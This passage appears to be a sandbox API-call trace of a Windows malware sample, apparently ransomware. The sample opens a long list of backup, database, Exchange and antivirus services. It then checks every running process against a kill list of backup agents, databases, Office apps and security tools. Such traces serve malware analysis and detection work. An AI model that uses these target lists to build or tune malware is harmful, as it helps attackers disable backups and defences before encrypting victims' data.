0x114a748 [0063.676] OpenServiceA (hSCManager=0x540e68, lpServiceName="MSSQL", dwDesiredAccess=0x2c) returned 0x0 [0063.676] GetTickCount () returned 0x114a748 [0063.676] OpenServiceA (hSCManager=0x540e68, lpServiceName="MSSQL$", dwDesiredAccess=0x2c) returned 0x0 [0063.676] GetTickCount () returned 0x114a748 [0063.676] OpenServiceA (hSCManager=0x540e68, lpServiceName="memtas", dwDesiredAccess=0x2c) returned 0x0 [0063.677] GetTickCount () returned 0x114a748 [0063.677] OpenServiceA (hSCManager=0x540e68, lpServiceName="mepocs", dwDesiredAccess=0x2c) returned 0x0 [0063.677] GetTickCount () returned 0x114a748 [0063.677] OpenServiceA (hSCManager=0x540e68, lpServiceName="sophos", dwDesiredAccess=0x2c) returned 0x0 [0063.677] GetTickCount () returned 0x114a748 [0063.677] OpenServiceA (hSCManager=0x540e68, lpServiceName="veeam", dwDesiredAccess=0x2c) returned 0x0 [0063.677] GetTickCount () returned 0x114a748 [0063.677] OpenServiceA (hSCManager=0x540e68, lpServiceName="backup", dwDesiredAccess=0x2c) returned 0x0 [0063.677] GetTickCount () returned 0x114a748 [0063.677] OpenServiceA (hSCManager=0x540e68, lpServiceName="bedbg", dwDesiredAccess=0x2c) returned 0x0 [0063.678] GetTickCount () returned 0x114a748 [0063.678] OpenServiceA (hSCManager=0x540e68, lpServiceName="PDVFSService", dwDesiredAccess=0x2c) returned 0x0 [0063.678] GetTickCount () returned 0x114a748 [0063.678] OpenServiceA (hSCManager=0x540e68, lpServiceName="BackupExecVSSProvider", dwDesiredAccess=0x2c) returned 0x0 [0063.678] GetTickCount () returned 0x114a748 [0063.678] OpenServiceA (hSCManager=0x540e68, lpServiceName="BackupExecAgentAccelerator", dwDesiredAccess=0x2c) returned 0x0 [0063.678] GetTickCount () returned 0x114a748 [0063.678] OpenServiceA (hSCManager=0x540e68, lpServiceName="BackupExecAgentBrowser", dwDesiredAccess=0x2c) returned 0x0 [0063.678] GetTickCount () returned 0x114a748 [0063.678] OpenServiceA (hSCManager=0x540e68, lpServiceName="BackupExecDiveciMediaService", dwDesiredAccess=0x2c) returned 0x0 [0063.678] GetTickCount () returned 0x114a748 [0063.678] OpenServiceA (hSCManager=0x540e68, lpServiceName="BackupExecJobEngine", dwDesiredAccess=0x2c) returned 0x0 [0063.679] GetTickCount () returned 0x114a748 [0063.679] OpenServiceA (hSCManager=0x540e68, lpServiceName="BackupExecManagementService", dwDesiredAccess=0x2c) returned 0x0 [0063.679] GetTickCount () returned 0x114a748 [0063.679] OpenServiceA (hSCManager=0x540e68, lpServiceName="BackupExecRPCService", dwDesiredAccess=0x2c) returned 0x0 [0063.679] GetTickCount () returned 0x114a748 [0063.679] OpenServiceA (hSCManager=0x540e68, lpServiceName="MVArmor", dwDesiredAccess=0x2c) returned 0x0 [0063.679] GetTickCount () returned 0x114a748 [0063.679] OpenServiceA (hSCManager=0x540e68, lpServiceName="MVarmor64", dwDesiredAccess=0x2c) returned 0x0 [0063.679] GetTickCount () returned 0x114a748 [0063.679] OpenServiceA (hSCManager=0x540e68, lpServiceName="stc_raw_agent", dwDesiredAccess=0x2c) returned 0x0 [0063.680] GetTickCount () returned 0x114a748 [0063.680] OpenServiceA (hSCManager=0x540e68, lpServiceName="VSNAPVSS", dwDesiredAccess=0x2c) returned 0x0 [0063.680] GetTickCount () returned 0x114a748 [0063.680] OpenServiceA (hSCManager=0x540e68, lpServiceName="VeeamTransportSvc", dwDesiredAccess=0x2c) returned 0x0 [0063.680] GetTickCount () returned 0x114a748 [0063.680] OpenServiceA (hSCManager=0x540e68, lpServiceName="VeeamDeploymentService", dwDesiredAccess=0x2c) returned 0x0 [0063.681] GetTickCount () returned 0x114a748 [0063.681] OpenServiceA (hSCManager=0x540e68, lpServiceName="VeeamNFSSvc", dwDesiredAccess=0x2c) returned 0x0 [0063.681] GetTickCount () returned 0x114a748 [0063.681] OpenServiceA (hSCManager=0x540e68, lpServiceName="AcronisAgent", dwDesiredAccess=0x2c) returned 0x0 [0063.681] GetTickCount () returned 0x114a748 [0063.681] OpenServiceA (hSCManager=0x540e68, lpServiceName="ARSM", dwDesiredAccess=0x2c) returned 0x0 [0063.681] GetTickCount () returned 0x114a748 [0063.681] OpenServiceA (hSCManager=0x540e68, lpServiceName="AcrSch2Svc", dwDesiredAccess=0x2c) returned 0x0 [0063.681] GetTickCount () returned 0x114a748 [0063.681] OpenServiceA (hSCManager=0x540e68, lpServiceName="CASAD2DWebSvc", dwDesiredAccess=0x2c) returned 0x0 [0063.682] GetTickCount () returned 0x114a748 [0063.682] OpenServiceA (hSCManager=0x540e68, lpServiceName="CAARCUpdateSvc", dwDesiredAccess=0x2c) returned 0x0 [0063.682] GetTickCount () returned 0x114a748 [0063.682] OpenServiceA (hSCManager=0x540e68, lpServiceName="WSBExchange", dwDesiredAccess=0x2c) returned 0x0 [0063.682] GetTickCount () returned 0x114a748 [0063.682] OpenServiceA (hSCManager=0x540e68, lpServiceName="MSExchange", dwDesiredAccess=0x2c) returned 0x0 [0063.682] GetTickCount () returned 0x114a748 [0063.682] OpenServiceA (hSCManager=0x540e68, lpServiceName="MSExchange$", dwDesiredAccess=0x2c) returned 0x0 [0063.683] CloseServiceHandle (hSCObject=0x540e68) returned 1 [0063.683] CoInitializeEx (pvReserved=0x0, dwCoInit=0x6) returned 0x0 [0064.549] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x194 [0064.556] Process32First (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0064.557] PathRemoveExtensionA (in: pszPath="[System Process]" | out: pszPath="[System Process]") [0064.568] lstrcmpiA (lpString1="[System Process]", lpString2="wxServer") returned -1 [0064.571] lstrcmpiA (lpString1="[System Process]", lpString2="wxServerView") returned -1 [0064.571] lstrcmpiA (lpString1="[System Process]", lpString2="Sqlservr") returned -1 [0064.571] lstrcmpiA (lpString1="[System Process]", lpString2="RAgui") returned -1 [0064.571] lstrcmpiA (lpString1="[System Process]", lpString2="supervise") returned -1 [0064.571] lstrcmpiA (lpString1="[System Process]", lpString2="Culture") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="RTVscan") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="Defwatch") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="sqlbrowser") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="winword") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="QBW32") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="QBDBMgr") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="qbupdate") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="QBCFMonitorService") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="axlbridge") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="QBIDPService") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="httpd") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="fdlauncher") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="MsDtSrvr") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="tomcat6") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="java") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="360se") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="360doctor") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="wdswfsafe") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="fdhost") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="GDscan") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="ZhuDongFangYu") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="QBDBMgrN") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="sqlwriter") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="mysqld") returned -1 [0064.572] lstrcmpiA (lpString1="[System Process]", lpString2="AutodeskDesktopApp") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="acwebbrowser") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="Creative Cloud") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="Adobe Desktop Service") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="CoreSync") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="Adobe CEF Helper") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="node") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="AdobeIPCBroker") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="sync-taskbar") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="sync-worker") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="InputPersonalization") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="AdobeCollabSync") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="BrCtrlCntr") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="BrCcUxSys") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="SimplyConnectionManager") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="Simply.SystemTrayIcon") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="fbguard") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="fbserver") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="ONENOTEM") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="YooIT") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="wsa_service") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="koaly-exp-engine-service") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="TeamViewer_Service") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="TeamViewer") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="tv_w32") returned -1 [0064.573] lstrcmpiA (lpString1="[System Process]", lpString2="tv_x64") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="TitanV") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="Ssms") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="notepad") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="RdrCEF") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="sam") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="sql") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="oracle") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="ocssd") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="dbsnmp") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="synctime") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="agntsvc") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="isqlplussvc") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="xfssvccon") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="mydesktopservice") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="ocautoupds") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="encsvc") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="firefox") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="tbirdconfig") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="mydesktopqos") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="ocomm") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="dbeng50") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="sqbcoreservice") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="excel") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="infopath") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="msaccess") returned -1 [0064.574] lstrcmpiA (lpString1="[System Process]", lpString2="mspub") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="onenote") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="outlook") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="powerpnt") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="steam") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="thebat") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="thunderbird") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="visio") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="winword") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="wordpad") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="bedbh") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="vxmon") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="benetns") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="bengien") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="pvlsvr") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="beserver") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="raw_agent_svc") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="vsnapvss") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="CagService") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="DellSystemDetect") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="EnterpriseClient") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="VeeamNFSSvc") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="VeeamTransportSvc") returned -1 [0064.575] lstrcmpiA (lpString1="[System Process]", lpString2="VeeamDeploymentSvc") returned -1 [0064.575] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0064.576] PathRemoveExtensionA (in: pszPath="System" | out: pszPath="System") [0064.576] lstrcmpiA (lpString1="System", lpString2="wxServer") returned -1 [0064.576] lstrcmpiA (lpString1="System", lpString2="wxServerView") returned -1 [0064.576] lstrcmpiA (lpString1="System", lpString2="Sqlservr") returned 1 [0064.576] lstrcmpiA (lpString1="System", lpString2="RAgui") returned 1 [0064.576] lstrcmpiA (lpString1="System", lpString2="supervise") returned 1 [0064.576] lstrcmpiA (lpString1="System", lpString2="Culture") returned 1 [0064.576] lstrcmpiA (lpString1="System", lpString2="RTVscan") returned 1 [0064.576] lstrcmpiA (lpString1="System", lpString2="Defwatch") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="sqlbrowser") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="winword") returned -1 [0064.577] lstrcmpiA (lpString1="System", lpString2="QBW32") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="QBDBMgr") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="qbupdate") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="QBCFMonitorService") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="axlbridge") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="QBIDPService") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="httpd") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="fdlauncher") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="MsDtSrvr") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="tomcat6") returned -1 [0064.577] lstrcmpiA (lpString1="System", lpString2="java") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="360se") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="360doctor") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="wdswfsafe") returned -1 [0064.577] lstrcmpiA (lpString1="System", lpString2="fdhost") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="GDscan") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="ZhuDongFangYu") returned -1 [0064.577] lstrcmpiA (lpString1="System", lpString2="QBDBMgrN") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="sqlwriter") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="mysqld") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="AutodeskDesktopApp") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="acwebbrowser") returned 1 [0064.577] lstrcmpiA (lpString1="System", lpString2="Creative Cloud") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="Adobe Desktop Service") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="CoreSync") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="Adobe CEF Helper") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="node") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="AdobeIPCBroker") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="sync-taskbar") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="sync-worker") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="InputPersonalization") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="AdobeCollabSync") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="BrCtrlCntr") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="BrCcUxSys") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="SimplyConnectionManager") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="Simply.SystemTrayIcon") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="fbguard") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="fbserver") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="ONENOTEM") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="YooIT") returned -1 [0064.578] lstrcmpiA (lpString1="System", lpString2="wsa_service") returned -1 [0064.578] lstrcmpiA (lpString1="System", lpString2="koaly-exp-engine-service") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="TeamViewer_Service") returned -1 [0064.578] lstrcmpiA (lpString1="System", lpString2="TeamViewer") returned -1 [0064.578] lstrcmpiA (lpString1="System", lpString2="tv_w32") returned -1 [0064.578] lstrcmpiA (lpString1="System", lpString2="tv_x64") returned -1 [0064.578] lstrcmpiA (lpString1="System", lpString2="TitanV") returned -1 [0064.578] lstrcmpiA (lpString1="System", lpString2="Ssms") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="notepad") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="RdrCEF") returned 1 [0064.578] lstrcmpiA (lpString1="System", lpString2="sam") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="sql") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="oracle") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="ocssd") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="dbsnmp") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="synctime") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="agntsvc") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="isqlplussvc") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="xfssvccon") returned -1 [0064.579] lstrcmpiA (lpString1="System", lpString2="mydesktopservice") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="ocautoupds") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="encsvc") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="firefox") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="tbirdconfig") returned -1 [0064.579] lstrcmpiA (lpString1="System", lpString2="mydesktopqos") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="ocomm") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="dbeng50") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="sqbcoreservice") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="excel") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="infopath") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="msaccess") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="mspub") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="onenote") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="outlook") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="powerpnt") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="steam") returned 1 [0064.579] lstrcmpiA (lpString1="System", lpString2="thebat") returned -1 [0064.580] lstrcmpiA (lpString1="System", lpString2="thunderbird") returned -1 [0064.580] lstrcmpiA (lpString1="System", lpString2="visio") returned -1 [0064.580] lstrcmpiA (lpString1="System", lpString2="winword") returned -1 [0064.580] lstrcmpiA (lpString1="System", lpString2="wordpad") returned -1 [0064.580] lstrcmpiA (lpString1="System", lpString2="bedbh") returned 1 [0064.580] lstrcmpiA (lpString1="System", lpString2="vxmon") returned -1 [0064.580] lstrcmpiA (lpString1="System", lpString2="benetns") returned 1 [0064.580] lstrcmpiA (lpString1="System", lpString2="bengien") returned 1 [0064.580] lstrcmpiA (lpString1="System", lpString2="pvlsvr") returned 1 [0064.580] lstrcmpiA (lpString1="System", lpString2="beserver") returned 1 [0064.580] lstrcmpiA (lpString1="System", lpString2="raw_agent_svc") returned 1 [0064.580] lstrcmpiA (lpString1="System", lpString2="vsnapvss") returned -1 [0064.580] lstrcmpiA (lpString1="System", lpString2="CagService") returned 1 [0064.580] lstrcmpiA (lpString1="System", lpString2="DellSystemDetect") returned 1 [0064.580] lstrcmpiA (lpString1="System", lpString2="EnterpriseClient") returned 1 [0064.580] lstrcmpiA (lpString1="System", lpString2="VeeamNFSSvc") returned -1 [0064.580] lstrcmpiA (lpString1="System", lpString2="VeeamTransportSvc") returned -1 [0064.580] lstrcmpiA (lpString1="System", lpString2="VeeamDeploymentSvc") returned -1 [0064.580] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0064.581] PathRemoveExtensionA (in: pszPath="smss.exe" | out: pszPath="smss") [0064.581] lstrcmpiA (lpString1="smss", lpString2="wxServer") returned -1 [0064.581] lstrcmpiA (lpString1="smss", lpString2="wxServerView") returned -1 [0064.581] lstrcmpiA (lpString1="smss", lpString2="Sqlservr") returned -1 [0064.581] lstrcmpiA (lpString1="smss", lpString2="RAgui") returned 1 [0064.581] lstrcmpiA (lpString1="smss", lpString2="supervise") returned -1 [0064.581] lstrcmpiA (lpString1="smss", lpString2="Culture") returned 1 [0064.581] lstrcmpiA (lpString1="smss", lpString2="RTVscan") returned 1 [0064.581] lstrcmpiA (lpString1="smss", lpString2="Defwatch") returned 1 [0064.581] lstrcmpiA (lpString1="smss", lpString2="sqlbrowser") returned -1 [0064.581] lstrcmpiA (lpString1="smss", lpString2="winword") returned -1 [0064.581] lstrcmpiA (lpString1="smss", lpString2="QBW32") returned 1 [0064.581] lstrcmpiA (lpString1="smss", lpString2="QBDBMgr") returned 1 [0064.581] lstrcmpiA (lpString1="smss", lpString2="qbupdate") returned 1 [0064.581] lstrcmpiA (lpString1="smss", lpString2="QBCFMonitorService") returned 1 [0064.581] lstrcmpiA (lpString1="smss", lpString2="axlbridge") returned 1 [0064.581] lstrcmpiA (lpString1="smss", lpString2="QBIDPService") returned 1 [0064.581] lstrcmpiA (lpString1="smss", lpString2="httpd") returned 1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="fdlauncher") returned 1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="MsDtSrvr") returned 1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="tomcat6") returned -1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="java") returned 1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="360se") returned 1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="360doctor") returned 1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="wdswfsafe") returned -1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="fdhost") returned 1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="GDscan") returned 1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="ZhuDongFangYu") returned -1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="QBDBMgrN") returned 1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="sqlwriter") returned -1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="mysqld") returned 1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="AutodeskDesktopApp") returned 1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="acwebbrowser") returned 1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="Creative Cloud") returned 1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="Adobe Desktop Service") returned 1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="CoreSync") returned 1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="Adobe CEF Helper") returned 1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="node") returned 1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="AdobeIPCBroker") returned 1 [0064.582] lstrcmpiA (lpString1="smss", lpString2="sync-taskbar") returned -1 [0064.583] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0064.583] PathRemoveExtensionA (in: pszPath="csrss.exe" | out: pszPath="csrss") [0064.583] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0064.584] PathRemoveExtensionA (in: pszPath="wininit.exe" | out: pszPath="wininit") [0064.584] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0064.585] PathRemoveExtensionA (in: pszPath="csrss.exe" | out: pszPath="csrss") [0064.585] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0064.586] PathRemoveExtensionA (in: pszPath="winlogon.exe" | out: pszPath="winlogon") [0064.586] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0064.586] PathRemoveExtensionA (in: pszPath="services.exe" | out: pszPath="services") [0064.586] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0064.587] PathRemoveExtensionA (in: pszPath="lsass.exe" | out: pszPath="lsass") [0064.587] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0064.588] PathRemoveExtensionA (in: pszPath="lsm.exe" | out: pszPath="lsm") [0064.588] Process32Next (in: hSnapshot=0x194, 